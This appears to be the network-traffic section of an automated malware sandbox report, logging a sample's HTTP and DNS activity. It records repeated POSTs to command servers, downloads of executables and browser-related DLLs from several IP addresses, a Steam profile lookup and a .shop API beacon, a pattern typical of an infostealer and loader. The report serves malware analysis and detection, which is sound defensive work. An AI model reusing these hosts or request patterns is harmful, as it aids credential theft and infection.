                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFCBAEHCAEGDHJKFHJKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGIJJKEHCAKEGCAKJKECUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDGDGDHDGDBFIDHDBAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 453Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAFHDGDGHDGCBFCFIDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 97541Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CBAKFCBFHJDHJKECAKEHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eobtgpmoikwju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tvjfpiseolhi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rmdbblxwbhidssfx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crrdnspsojxi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jfmevrxlmgrgcter.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dcrgrikamcipdku.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyuvkhsnugkdc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yukvxpqjtjfrjqw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lvfcajibsxtsk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxmeirvuxixgqp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycpgoadxufkj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 238Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blkpeagecciexc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: dbfhns.in
                Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bffxawywalbkr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvunmrjdxhvinab.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 216Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unjbbvgiwfeg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://krexlrcywwqsrfo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlqkylljcnp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://caefrlsewqoaju.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bjcivuphfkkr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdscberxlhps.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gkjoqsoewca.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhlofuoqneckx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nygflvrwjiwigd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iuqvispkjnrqwr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnnxnofesovuip.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://orsrbhepjknkic.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 357Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vmhgovbhvgan.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://geojjabhsye.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mmoytfgyxyxpsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://njscijpdcohnar.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tssxxpdwgkaqunjd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hnsdtfxaaeohqfta.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: dbfhns.in
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ioilnxgrkungvgve.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: dbfhns.in
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: unknownTCP traffic detected without corresponding DNS query: 45.129.96.86
                Source: C:\Users\user\AppData\Local\Temp\katB4C0.tmpCode function: 11_2_6CB0CC60 PR_Recv,11_2_6CB0CC60
                Source: global trafficHTTP traffic detected: GET /profiles/76561199689717899 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /sqls.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0Host: 65.109.242.59Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /file/update.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 45.129.96.86
                Source: global trafficHTTP traffic detected: GET /pintxi1lv.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.124
                Source: global trafficHTTP traffic detected: GET /file/host_so.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.235.137.54
                Source: global trafficHTTP traffic detected: GET /sdf34ert3etgrthrthfghfghjfgh.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 91.202.233.231
                Source: katB4C0.tmp, 0000000B.00000003.2317523394.0000000000983000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: dbfhns.in
                Source: global trafficDNS traffic detected: DNS query: whispedwoodmoodsksl.shop
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: whispedwoodmoodsksl.shop
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 85 ec Data Ascii: r
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 26 May 2024 08:28:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
